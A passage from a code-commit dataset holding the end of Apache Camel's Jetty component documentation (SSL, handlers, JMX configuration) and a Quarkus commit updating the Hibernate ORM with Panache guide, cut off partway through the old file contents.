*exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. The value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *filterInitParameters* (consumer) | Configuration of the filter init parameters. These parameters will be applied to the filter list before starting the jetty server. | | Map\n| *filters* (consumer) | Allows using a custom filters which is putted into a list and can be find in the Registry. Multiple values can be separated by comma. | | List\n| *handlers* (consumer) | Specifies a comma-delimited set of Handler instances to lookup in your Registry. These handlers are added to the Jetty servlet context (for example, to add security). Important: You can not use different handlers with different Jetty endpoints using the same port number. The handlers is associated to the port number. If you need different handlers, then use different port numbers. | | List\n| *multipartFilter* (consumer) | Allows using a custom multipart filter. Note: setting multipartFilterRef forces the value of enableMultipartFilter to true. | | Filter\n| *optionsEnabled* (consumer) | Specifies whether to enable HTTP OPTIONS for this Servlet consumer. By default OPTIONS is turned off. | false | boolean\n| *traceEnabled* (consumer) | Specifies whether to enable HTTP TRACE for this Servlet consumer. By default TRACE is turned off. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *mapHttpMessageBody* (advanced) | If this option is true then IN exchange Body of the exchange will be mapped to HTTP body. Setting this to false will avoid the HTTP mapping. | true | boolean\n| *mapHttpMessageFormUrlEncoded Body* (advanced) | If this option is true then IN exchange Form Encoded body of the exchange will be mapped to HTTP. Setting this to false will avoid the HTTP Form Encoded body mapping. | true | boolean\n| *mapHttpMessageHeaders* (advanced) | If this option is true then IN exchange Headers of the exchange will be mapped to HTTP headers. Setting this to false will avoid the HTTP Headers mapping. | true | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *sslContextParameters* (security) | To configure security using SSLContextParameters | | SSLContextParameters\n|===\n\/\/ endpoint options: END\n\n\n\n\n== Message Headers\n\nCamel uses the same message headers as the xref:http-component.adoc[HTTP]\ncomponent.\nIt also uses (Exchange.HTTP_CHUNKED,CamelHttpChunked)\nheader to turn on or turn off the chuched encoding on the camel-jetty\nconsumer.\n\nCamel also populates *all* request.parameter and request.headers. For\nexample, given a client request with the URL,\n`\\http:\/\/myserver\/myserver?orderid=123`, the exchange will contain a\nheader named `orderid` with the value 123.\n\nYou can get the request.parameter from the\nmessage header not only from Get Method, but also other HTTP method.\n\n== Usage\n\nThe Jetty component supports consumer endpoints.\n\n== Consumer Example\n\nIn this sample we define a route that exposes a HTTP service at\n`\\http:\/\/localhost:8080\/myapp\/myservice`:\n\n*Usage of localhost*\n\nWhen you specify `localhost` in a URL, Camel exposes the endpoint only\non the local TCP\/IP network interface, so it cannot be accessed from\noutside the machine it operates on.\n\nIf you need to expose a Jetty endpoint on a specific network interface,\nthe numerical IP address of this interface should be used as the host.\nIf you need to expose a Jetty endpoint on all network interfaces, the\n`0.0.0.0` address should be used.\n\nTo listen across an entire URI prefix, see\nxref:manual:faq:how-do-i-let-jetty-match-wildcards.adoc[How do I let Jetty match wildcards].\n\nIf you actually want to expose routes by HTTP and already have a\nServlet, you should instead refer to the\nxref:servlet-component.adoc[Servlet Transport].\n\nOur business logic is implemented in the `MyBookService` class, which\naccesses the HTTP request contents and then returns a response. +\n *Note:* The `assert` call appears in this example, because the code is\npart of an unit test.\n\nThe following sample shows a content-based route that routes all\nrequests containing the URI parameter, `one`, to the endpoint,\n`mock:one`, and all others to `mock:other`.\n\nSo if a client sends the HTTP request, `\\http:\/\/serverUri?one=hello`, the\nJetty component will copy the HTTP request parameter, `one` to the\nexchange's `in.header`. We can then use the `simple` language to route\nexchanges that contain this header to a specific endpoint and all others\nto another. If we used a language more powerful than\nxref:languages:simple-language.adoc[Simple] (such as xref:languages:ognl-language.adoc[OGNL])\nwe could also test for the parameter value and do routing based on the\nheader value as well.\n\n== Session Support\n\nThe session support option, `sessionSupport`, can be used to enable a\n`HttpSession` object and access the session object while processing the\nexchange. For example, the following route enables sessions:\n\n[source,xml]\n----\n<route>\n <from uri=\"jetty:http:\/\/0.0.0.0\/myapp\/myservice\/?sessionSupport=true\"\/>\n <processRef ref=\"myCode\"\/>\n<\/route>\n----\n\nThe `myCode` Processor can be instantiated by a\nSpring `bean` element:\n\n[source,xml]\n----\n<bean id=\"myCode\" class=\"com.mycompany.MyCodeProcessor\"\/>\n----\n\nWhere the processor implementation can access the `HttpSession` as\nfollows:\n\n[source,java]\n----\npublic void process(Exchange exchange) throws Exception {\n HttpSession session = exchange.getIn(HttpMessage.class).getRequest().getSession();\n ...\n}\n----\n\n== SSL Support (HTTPS)\n\n[[Jetty-UsingtheJSSEConfigurationUtility]]\nUsing the JSSE Configuration Utility\n\nThe Jetty component supports SSL\/TLS configuration\nthrough the xref:manual::camel-configuration-utilities.adoc[Camel JSSE\nConfiguration Utility]. This utility greatly decreases the amount of\ncomponent specific code you need to write and is configurable at the\nendpoint and component levels. The following examples demonstrate how\nto use the utility with the Jetty component.\n\n[[Jetty-Programmaticconfigurationofthecomponent]]\nProgrammatic configuration of the component\n\n[source,java]\n----\nKeyStoreParameters ksp = new KeyStoreParameters();\nksp.setResource(\"\/users\/home\/server\/keystore.jks\");\nksp.setPassword(\"keystorePassword\");\n\nKeyManagersParameters kmp = new KeyManagersParameters();\nkmp.setKeyStore(ksp);\nkmp.setKeyPassword(\"keyPassword\");\n\nSSLContextParameters scp = new SSLContextParameters();\nscp.setKeyManagers(kmp);\n\nJettyComponent jettyComponent = getContext().getComponent(\"jetty\", JettyComponent.class);\njettyComponent.setSslContextParameters(scp);\n----\n\n[[Jetty-SpringDSLbasedconfigurationofendpoint]]\nSpring DSL based configuration of endpoint\n\n[source,xml]\n----\n <camel:sslContextParameters\n id=\"sslContextParameters\">\n <camel:keyManagers\n keyPassword=\"keyPassword\">\n <camel:keyStore\n resource=\"\/users\/home\/server\/keystore.jks\"\n password=\"keystorePassword\"\/>\n <\/camel:keyManagers>\n <\/camel:sslContextParameters>\n\n <to uri=\"jetty:https:\/\/127.0.0.1\/mail\/?sslContextParameters=#sslContextParameters\"\/>\n\n----\n\n[[Jetty-ConfiguringJettyDirectly]]\nConfiguring Jetty Directly\n\nJetty provides SSL support out of the box. To enable Jetty to run in SSL\nmode, simply format the URI with the `\\https:\/\/` prefix---for example:\n\n[source,xml]\n----\n<from uri=\"jetty:https:\/\/0.0.0.0\/myapp\/myservice\/\"\/>\n----\n\nJetty also needs to know where to load your keystore from and what\npasswords to use in order to load the correct SSL certificate. Set the\nfollowing JVM System Properties:\n\n* `org.eclipse.jetty.ssl.keystore` specifies the location of the Java\nkeystore file, which contains the Jetty server's own X.509 certificate\nin a _key entry_. A key entry stores the X.509 certificate (effectively,\nthe _public key_) and also its associated private key.\n* `org.eclipse.jetty.ssl.password` the store password, which is required\nto access the keystore file (this is the same password that is supplied\nto the `keystore` command's `-storepass` option).\n* `org.eclipse.jetty.ssl.keypassword` the key password, which is used to\naccess the certificate's key entry in the keystore (this is the same\npassword that is supplied to the `keystore` command's `-keypass`\noption).\n\nFor details of how to configure SSL on a Jetty endpoint, read the\nfollowing documentation at the Jetty Site:\nhttp:\/\/docs.codehaus.org\/display\/JETTY\/How+to+configure+SSL[http:\/\/docs.codehaus.org\/display\/JETTY\/How+to+configure+SSL]\n\nSome SSL properties aren't exposed directly by Camel, however Camel does\nexpose the underlying SslSocketConnector, which will allow you to set\nproperties like needClientAuth for mutual authentication requiring a\nclient certificate or wantClientAuth for mutual authentication where a\nclient doesn't need a certificate but can have one.\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"sslSocketConnectors\">\n <map>\n <entry key=\"8043\">\n <bean class=\"org.eclipse.jetty.server.ssl.SslSelectChannelConnector\">\n <property name=\"password\" value=\"...\"\/>\n <property name=\"keyPassword\" value=\"...\"\/>\n <property name=\"keystore\" value=\"...\"\/>\n <property name=\"needClientAuth\" value=\"...\"\/>\n <property name=\"truststore\" value=\"...\"\/>\n <\/bean>\n <\/entry>\n <\/map>\n <\/property>\n<\/bean>\n----\n\nThe value you use as keys in the above map is the port you configure\nJetty to listen on.\n\n=== Configuring general SSL properties\n\nInstead of a per port number specific SSL socket connector (as shown\nabove) you can now configure general properties which applies for all\nSSL socket connectors (which is not explicit configured as above with\nthe port number as entry).\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"sslSocketConnectorProperties\">\n <map>\n <entry key=\"password\" value=\"...\"\/>\n <entry key=\"keyPassword\" value=\"...\"\/>\n <entry key=\"keystore\" value=\"...\"\/>\n <entry key=\"needClientAuth\" value=\"...\"\/>\n <entry key=\"truststore\" value=\"...\"\/>\n <\/map>\n <\/property>\n<\/bean>\n----\n\n=== How to obtain reference to the X509Certificate\n\nJetty stores a reference to the certificate in the HttpServletRequest\nwhich you can access from code as follows:\n\n[source,java]\n----\nHttpServletRequest req = exchange.getIn().getBody(HttpServletRequest.class);\nX509Certificate cert = (X509Certificate) req.getAttribute(\"javax.servlet.request.X509Certificate\")\n----\n\n=== Configuring general HTTP properties\n\nInstead of a per port number specific HTTP socket connector (as shown\nabove) you can now configure general properties which applies for all\nHTTP socket connectors (which is not explicit configured as above with\nthe port number as entry).\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"socketConnectorProperties\">\n <map>\n <entry key=\"acceptors\" value=\"4\"\/>\n <entry key=\"maxIdleTime\" value=\"300000\"\/>\n <\/map>\n <\/property>\n<\/bean>\n----\n\n=== Obtaining X-Forwarded-For header with HttpServletRequest.getRemoteAddr()\n\nIf the HTTP requests are handled by an Apache server and forwarded to\njetty with mod_proxy, the original client IP address is in the\nX-Forwarded-For header and the HttpServletRequest.getRemoteAddr() will\nreturn the address of the Apache proxy.\n\nJetty has a forwarded property which takes the value from\nX-Forwarded-For and places it in the HttpServletRequest remoteAddr\nproperty. This property is not available directly through the endpoint\nconfiguration but it can be easily added using the socketConnectors\nproperty:\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"socketConnectors\">\n <map>\n <entry key=\"8080\">\n <bean class=\"org.eclipse.jetty.server.nio.SelectChannelConnector\">\n <property name=\"forwarded\" value=\"true\"\/>\n <\/bean>\n <\/entry>\n <\/map>\n <\/property>\n<\/bean>\n----\n\nThis is particularly useful when an existing Apache server handles TLS\nconnections for a domain and proxies them to application servers\ninternally.\n\n== Default behavior for returning HTTP status codes\n\nThe default behavior of HTTP status codes is defined by the\n`org.apache.camel.component.http.DefaultHttpBinding` class, which\nhandles how a response is written and also sets the HTTP status code.\n\nIf the exchange was processed successfully, the 200 HTTP status code is\nreturned. +\n If the exchange failed with an exception, the 500 HTTP status code is\nreturned, and the stacktrace is returned in the body. If you want to\nspecify which HTTP status code to return, set the code in the\n`Exchange.HTTP_RESPONSE_CODE` header of the OUT message.\n\n== Customizing HttpBinding\n\nBy default, Camel uses the\n`org.apache.camel.component.http.DefaultHttpBinding` to handle how a\nresponse is written. If you like, you can customize this behavior either\nby implementing your own `HttpBinding` class or by extending\n`DefaultHttpBinding` and overriding the appropriate methods.\n\nThe following example shows how to customize the `DefaultHttpBinding` in\norder to change how exceptions are returned:\n\nWe can then create an instance of our binding and register it in the\nSpring registry as follows:\n\n[source,xml]\n----\n<bean id=\"mybinding\" class=\"com.mycompany.MyHttpBinding\"\/>\n----\n\nAnd then we can reference this binding when we define the route:\n\n[source,xml]\n----\n<route>\n <from uri=\"jetty:http:\/\/0.0.0.0:8080\/myapp\/myservice?httpBindingRef=mybinding\"\/>\n <to uri=\"bean:doSomething\"\/>\n<\/route>\n----\n\n== Jetty handlers and security configuration\n\nYou can configure a list of Jetty handlers on the endpoint, which can be\nuseful for enabling advanced Jetty security features. These handlers are\nconfigured in Spring XML as follows:\n\n[source,xml]\n----\n<bean id=\"userRealm\" class=\"org.mortbay.jetty.plus.jaas.JAASUserRealm\">\n <property name=\"name\" value=\"tracker-users\"\/>\n <property name=\"loginModuleName\" value=\"ldaploginmodule\"\/>\n<\/bean>\n\n<bean id=\"constraint\" class=\"org.mortbay.jetty.security.Constraint\">\n <property name=\"name\" value=\"BASIC\"\/>\n <property name=\"roles\" value=\"tracker-users\"\/>\n <property name=\"authenticate\" value=\"true\"\/>\n<\/bean>\n\n<bean id=\"constraintMapping\" class=\"org.mortbay.jetty.security.ConstraintMapping\">\n <property name=\"constraint\" ref=\"constraint\"\/>\n <property name=\"pathSpec\" value=\"\/*\"\/>\n<\/bean>\n\n<bean id=\"securityHandler\" class=\"org.mortbay.jetty.security.SecurityHandler\">\n <property name=\"userRealm\" ref=\"userRealm\"\/>\n <property name=\"constraintMappings\" ref=\"constraintMapping\"\/>\n<\/bean>\n----\n\nYou can configure a list of Jetty handlers as follows:\n\n[source,xml]\n----\n<bean id=\"constraint\" class=\"org.eclipse.jetty.http.security.Constraint\">\n <property name=\"name\" value=\"BASIC\"\/>\n <property name=\"roles\" value=\"tracker-users\"\/>\n <property name=\"authenticate\" value=\"true\"\/>\n<\/bean>\n\n<bean id=\"constraintMapping\" class=\"org.eclipse.jetty.security.ConstraintMapping\">\n <property name=\"constraint\" ref=\"constraint\"\/>\n <property name=\"pathSpec\" value=\"\/*\"\/>\n<\/bean>\n\n<bean id=\"securityHandler\" class=\"org.eclipse.jetty.security.ConstraintSecurityHandler\">\n <property name=\"authenticator\">\n <bean class=\"org.eclipse.jetty.security.authentication.BasicAuthenticator\"\/>\n <\/property>\n <property name=\"constraintMappings\">\n <list>\n <ref bean=\"constraintMapping\"\/>\n <\/list>\n <\/property>\n<\/bean>\n----\n\nYou can then define the endpoint as:\n\n[source,java]\n----\nfrom(\"jetty:http:\/\/0.0.0.0:9080\/myservice?handlers=securityHandler\")\n----\n\nIf you need more handlers, set the `handlers` option equal to a\ncomma-separated list of bean IDs.\n\n== How to return a custom HTTP 500 reply message\n\nYou may want to return a custom reply message when something goes wrong,\ninstead of the default reply message Camel xref:jetty-component.adoc[Jetty]\nreplies with. +\n You could use a custom `HttpBinding` to be in control of the message\nmapping, but often it may be easier to use Camel's\nException Clause to construct the custom\nreply message. For example as show here, where we return\n`Dude something went wrong` with HTTP error code 500:\n\n== Multi-part Form support\n\nThe camel-jetty component supports multipart form post out of box.\nThe submitted form-data are mapped into the message header. Camel-jetty\ncreates an attachment for each uploaded file. The file name is mapped to\nthe name of the attachment. The content type is set as the content type\nof the attachment file name. You can find the example here.\n\n== Jetty JMX support\n\nThe camel-jetty component supports the enabling of Jetty's JMX\ncapabilities at the component and endpoint level with the endpoint\nconfiguration taking priority. Note that JMX must be enabled within the\nCamel context in order to enable JMX support in this component as the\ncomponent provides Jetty with a reference to the MBeanServer registered\nwith the Camel context. Because the camel-jetty component caches and\nreuses Jetty resources for a given protocol\/host\/port pairing, this\nconfiguration option will only be evaluated during the creation of the\nfirst endpoint to use a protocol\/host\/port pairing. For example, given\ntwo routes created from the following XML fragments, JMX support would\nremain enabled for all endpoints listening on \"https:\/\/0.0.0.0\".\n\n[source,xml]\n----\n<from uri=\"jetty:https:\/\/0.0.0.0\/myapp\/myservice1\/?enableJmx=true\"\/>\n----\n\n[source,xml]\n----\n<from uri=\"jetty:https:\/\/0.0.0.0\/myapp\/myservice2\/?enableJmx=false\"\/>\n----\n\nThe camel-jetty component also provides for direct configuration of the\nJetty MBeanContainer. Jetty creates MBean names dynamically. If you are\nrunning another instance of Jetty outside of the Camel context and\nsharing the same MBeanServer between the instances, you can provide both\ninstances with a reference to the same MBeanContainer in order to avoid\nname collisions when registering Jetty MBeans.\n\ninclude::camel-spring-boot::page$jetty-starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb866a1ab623c43877f5ac95b0d61eb058eed578","subject":"Fix #2302: Hibernate ORM with Panache guide: mention regular HQL calls","message":"Fix #2302: Hibernate ORM with Panache guide: mention regular HQL calls\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/hibernate-orm-panache-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/hibernate-orm-panache-guide.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n\ninclude::.\/attributes.adoc[]\n= {project-name} - Simplified Hibernate ORM with Panache\n:config-file: application.properties\n\nHibernate ORM is the de facto JPA implementation and offers you the full breadth of an Object Relational Mapper.\nIt makes complex mappings possible, but it does not make simple and common mappings trivial.\nHibernate ORM with Panache focuses on making your entities trivial and fun to write in {project-name}.\n\n== First: an example\n\nWhat we're doing in Panache is allow you to write your Hibernate ORM entities like this:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nYou have noticed how much more compact and readable the code is?\nDoes this look interesting? Read on!\n\nNOTE: the `list()` method might be surprising at first. It takes fragments of HQL (JP-QL) queries and contextualize the rest. That makes for very concise but yet readable code.\n\n== Setting up and configuring Hibernate ORM with Panache\n\nTo get started:\n\n* add your settings in `{config-file}`\n* annotate your entities with `@Entity` and make them extend `PanacheEntity`\n* place your entity logic in static methods in your entities\n\nFollow the link:hibernate-orm-guide.html#setting-up-and-configuring-hibernate-orm-without-persistence-xml-recommended[Hibernate set-up guide for all configuration].\n\nIn your `pom.xml`, add the following dependencies:\n\n* the Panache JPA extension\n* your JDBC driver extension (`quarkus-jdbc-postgresql`, `quarkus-jdbc-h2`, `quarkus-jdbc-mariadb`, ...)\n\n[source,xml]\n--\n<dependencies>\n <!-- Hibernate ORM specific dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-orm-panache<\/artifactId>\n <\/dependency>\n\n <!-- JDBC driver dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-jdbc-postgresql<\/artifactId>\n <\/dependency>\n<\/dependencies>\n--\n\nThen add the relevant configuration properties in `{config-file}`.\n\n[source,properties]\n--\n# configure your datasource\nquarkus.datasource.url = jdbc:postgresql:\/\/localhost:5432\/mydatabase\nquarkus.datasource.driver = org.postgresql.Driver\nquarkus.datasource.username = sarah\nquarkus.datasource.password = connor\n\n# drop and create the database at startup (use `update` to only update the schema)\nquarkus.hibernate-orm.database.generation = drop-and-create\n--\n\n== Defining your entity\n\nTo define a Panache entity, simply extend `PanacheEntity`, annotate it with `@Entity` and add your\ncolumns as public fields:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n}\n--\n\nYou can put all your JPA column annotations on the public fields. If you need a field to not be persisted, use the\n`@Transient` annotation on it. If you need to write accessors, you can:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n \/\/ this will store all names in lowercase in the DB,\n \/\/ and make them uppercase in the model\n public String getName(){\n return name.toUppercase();\n }\n \n public String setName(String name){\n this.name = name.toLowercase();\n }\n}\n--\n\nAnd thanks to our field access rewrite, when your users read `person.name` they will actually call your `getName()` accessor,\nand similarly for field writes and the setter.\nThis allows for proper encapsulation at runtime as all fields calls will be replaced by the corresponding getter\/setter calls.\n\n== Most useful operations\n\nOnce you have written your entity, here are the most common operations you will be able to do:\n\n[source,java]\n--\n\/\/ creating a person\nPerson person = new Person();\nperson.name = \"Stef\";\nperson.birth = LocalDate.of(1910, Month.FEBRUARY, 1);\nperson.status = Status.Alive;\n\n\/\/ persist it\nperson.persist();\n\n\/\/ note that once persisted, you don't need to explicitly save your entity: all\n\/\/ modifications are automatically persisted on transaction commit.\n\n\/\/ check if it's persistent\nif(person.isPersistent()){\n \/\/ delete it\n person.delete();\n} \n\n\/\/ getting a list of all Person entities\nList<Person> allPersons = Person.listAll();\n\n\/\/ finding a specific person by ID\nperson = Person.findById(personId);\n\n\/\/ finding all living persons\nList<Person> livingPersons = Person.list(\"status\", Status.Alive);\n\n\/\/ counting all persons\nlong countAll = Person.count();\n\n\/\/ counting all living persons\nlong countAlive = Person.count(\"status\", Status.Alive);\n\n\/\/ delete all living persons\nPerson.delete(\"status\", Status.Alive);\n\n\/\/ delete all persons\nPerson.deleteAll();\n--\n\nAll `list` methods have equivalent `stream` versions.\n\n[source,java]\n--\nStream<Person> persons = Person.streamAll();\nList<String> namesButEmmanuels = persons\n .map(p -> p.name.toLowerCase() )\n .filter( n -> ! \"emmanuel\".equals(n) )\n .collect(Collectors.toList());\n--\n\n== Paging\n\nYou should only use `list` and `stream` methods if your table contains small enough data sets. For larger data\nsets you can use the `find` method equivalents, which return a `PanacheQuery` on which you can do paging:\n\n[source,java]\n--\n\/\/ create a query for all living persons\nPanacheQuery<Person> livingPersons = Person.find(\"status\", Status.Alive);\n\n\/\/ make it use pages of 25 entries at a time\nlivingPersons.page(Page.ofSize(25));\n\n\/\/ get the first page\nList<Person> firstPage = livingPersons.list();\n\n\/\/ get the second page\nList<Person> secondPage = livingPersons.nextPage().list();\n\n\/\/ get page 7\nList<Person> page7 = livingPersons.page(Page.of(7, 25)).list();\n\n\/\/ get the number of pages\nint numberOfPages = livingPersons.pageCount();\n\n\/\/ get the total number of entities returned by this query without paging\nint count = livingPersons.count();\n\n\/\/ and you can chain methods of course\nreturn Person.find(\"status\", Status.Alive)\n .page(Page.ofSize(25))\n .nextPage()\n .stream()\n--\n\nThe `PanacheQuery` type has many other methods to deal with paging and returning streams.\n\n== Sorting\n\nAll methods accepting a query string also accept the following simplified query form:\n\n[source,java]\n--\nList<Person> persons = Person.list(\"order by name,birth\");\n--\n\nBut these methods also accept an optional `Sort` parameter, which allows your to abstract your sorting:\n\n[source,java]\n--\nList<Person> persons = Person.list(Sort.by(\"name\").and(\"birth\"));\n\n\/\/ and with more restrictions\nList<Person> persons = Person.list(\"status\", Sort.by(\"name\").and(\"birth\"), Status.Alive);\n--\n\nThe `Sort` class has plenty of methods for adding columns and specifying sort direction.\n\n== Adding entity methods\n\nIn general, we recommend not adding custom queries for your entities outside of the entities themselves,\nto keep all model queries close to the models they operate on. So we recommend adding them as static methods\nin your entity class:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\n== Simplified queries\n\nNormally, HQL queries are of this form: `from EntityName [where ...] [order by ...]`, with optional elements\nat the end.\n\nIf your query does not start with `from`, we support the following additional forms:\n\n- `order by ...` which will expand to `from EntityName order by ...`\n- `<singleColumnName>` (and single parameter) which will expand to `from EntityName where <singleColumnName> = ?`\n- `<query>` will expand to `from EntityName where <query>`\n\nNOTE: Naturally, you can also write your queries in plain \nlink:https:\/\/docs.jboss.org\/hibernate\/orm\/5.4\/userguide\/html_single\/Hibernate_User_Guide.html#hql[HQL].\n\n== Query parameters\n\nYou can pass query parameters by index (1-based):\n\n[source,java]\n--\nPerson.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive);\n--\n\nOr by name using a `Map`:\n\n[source,java]\n--\nMap<String, Object> params = new HashMap<>();\nparams.put(\"name\", \"stef\");\nparams.put(\"status\", Status.Alive);\nPerson.find(\"name = :name and status = :status\", params);\n--\n\nOr using the convenience class `Parameters` to either build a `Map` or just use as-is:\n\n[source,java]\n--\n\/\/ generate a Map\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive).map());\n\n\/\/ use it as-is\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive));\n--\n\nEvery query operation accepts passing parameters by index (`Object...`), or by name (`Map<String,Object>` or `Parameters`).\n\n== The DAO\/Repository option\n\nLook, we get it: you have a love\/hate relationship with DAOs\/Repositories but you can't live without them. We don't judge, we\nknow life is tough and we've got you covered.\n\nIf you want to have Repositories, you can get the exact same convenient methods injected in your Repository by making it\nimplement `PanacheRepository`:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepository<Person> {\n\n \/\/ put your custom logic here as instance methods\n \n public Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nAbsolutely all the operations that are defined on `PanacheEntityBase` are available on your DAO, so using it\nis exactly the same except you need to inject it:\n\n[source,java]\n--\n@Inject\nPersonRepository personRepository;\n\n@GET\npublic long count(){\n return personRepository.count();\n}\n--\n\nSo if Repositories are your thing, you can keep doing them. Even with repositories, you can keep your entities as\nsubclasses of `PanacheEntity` in order to get the ID and public fields working, but you can even skip that and\ngo back to specifying your ID and using getters and setters if that's your thing. We're not judging.\n\n== Transactions\n\nIn Quarkus, every method that modifies the database must be run in a transaction. If you try to modify the database \noutside a transaction you will get an exception. It is not required for querying operations.\n\nYou can annotate any method with `@Transactional` in order to get a transaction. We recommend doing so in your\nREST endpoints where you manipulate entities.\n\n\n== Custom IDs\n\nIDs are often a touchy subject, and not everyone's up for letting them handled by the framework, once again we\nhave you covered.\n\nYou can specify your own ID strategy by extending `PanacheEntityBase` instead of `PanacheEntity`. Then\nyou just declare whatever ID you want as a public field:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntityBase {\n\n @Id\n @SequenceGenerator(\n name = \"personSequence\",\n sequenceName = \"person_id_seq\",\n allocationSize = 1,\n initialValue = 4)\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"personSequence\")\n public Integer id;\n\n ...\n}\n--\n\nIf you're using repositories, then you will want to extend `PanacheRepositoryBase` instead of `PanacheRepository`\nand specify your ID type as an extra type parameter:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepositoryBase<Person,Integer> {\n\n ...\n}\n--\n\n== How and why we simplify Hibernate ORM mappings\n\nWhen it comes to writing Hibernate ORM entities, there are a number of annoying things that users have grown used to \nreluctantly deal with, such as:\n\n- Duplicating ID logic: most entities need an ID, most people don't care how it's set, because it's not really\nrelevant to your model.\n- Dumb getters and setters: since Java lacks support for properties in the language, we have to create fields,\nthen generate getters and setters for those fields, even if they don't actually do anything more than read\/write\nthe fields.\n- Traditional EE patterns advise to split entity definition (the model) from the operations you can do on them\n(DAOs, Repositories), but really that requires an unnatural split between the state and its operations even though\nwe would never do something like that for regular objects in the Object Oriented architecture, where state and methods\nare in the same class. Moreover, this requires two classes per entity, and requires injection of the DAO or Repository\nwhere you need to do entity operations, which breaks your edit flow and requires you to get out of the code you're\nwriting to set up an injection point before coming back to use it.\n- Hibernate queries are super powerful, but overly verbose for common operations, requiring you to write queries even\nwhen you don't need all the parts.\n- Hibernate is very general-purpose, but does not make it trivial to do trivial operations that make up 90% of our\nmodel usage.\n\nWith Panache, we took an opinionated approach to tackle all these problems:\n\n- Make your entities extend `PanacheEntity`: it has an ID field that is auto-generated. If you require\na custom ID strategy, you can extend `PanacheEntityBase` instead and handle the ID yourself.\n- Use public fields. Get rid of dumb getter and setters. Under the hood, we will generate all getters and setters\nthat are missing, and rewrite every access to these fields to use the accessor methods. This way you can still\nwrite _useful_ accessors when you need them, which will be used even though your entity users still use field accesses.\n- Don't use DAOs or Repositories: put all your entity logic in static methods in your entity class. Your entity superclass\ncomes with lots of super useful static methods and you can add your own in your entity class. Users can just start using\nyour entity `Person` by typing `Person.` and getting completion for all the operations in a single place.\n- Don't write parts of the query that you don't need: write `Person.find(\"order by name\")` or\n`Person.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive)` or even better\n`Person.find(\"name\", \"stef\")`.\n\nThat's all there is to it: with Panache, Hibernate ORM has never looked so trim and neat. \n\n== Defining entities in external projects or jars\n\nHibernate ORM with Panache in Quarkus relies on compile-time bytecode enhancements to your entities. If you define your entities in the\nsame project where you build your Quarkus application, everything will work fine. If the entities come from external projects\nor jars, you should build those jars with the Jandex Maven plugin, so that your entities will be indexed and found by Quarkus\nand enhanced:\n\n[source,xml]\n--\n<plugin>\n <groupId>org.jboss.jandex<\/groupId>\n <artifactId>jandex-maven-plugin<\/artifactId>\n <version>1.0.3<\/version>\n <executions>\n <execution>\n <id>make-index<\/id>\n <goals>\n <goal>jandex<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <dependencies>\n <dependency>\n <groupId>org.jboss<\/groupId>\n <artifactId>jandex<\/artifactId>\n <version>2.1.1.Final<\/version>\n <\/dependency>\n <\/dependencies>\n<\/plugin>\n--\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n\ninclude::.\/attributes.adoc[]\n= {project-name} - Simplified Hibernate ORM with Panache\n:config-file: application.properties\n\nHibernate ORM is the de facto JPA implementation and offers you the full breadth of an Object Relational Mapper.\nIt makes complex mappings possible, but it does not make simple and common mappings trivial.\nHibernate ORM with Panache focuses on making your entities trivial and fun to write in {project-name}.\n\n== First: an example\n\nWhat we're doing in Panache 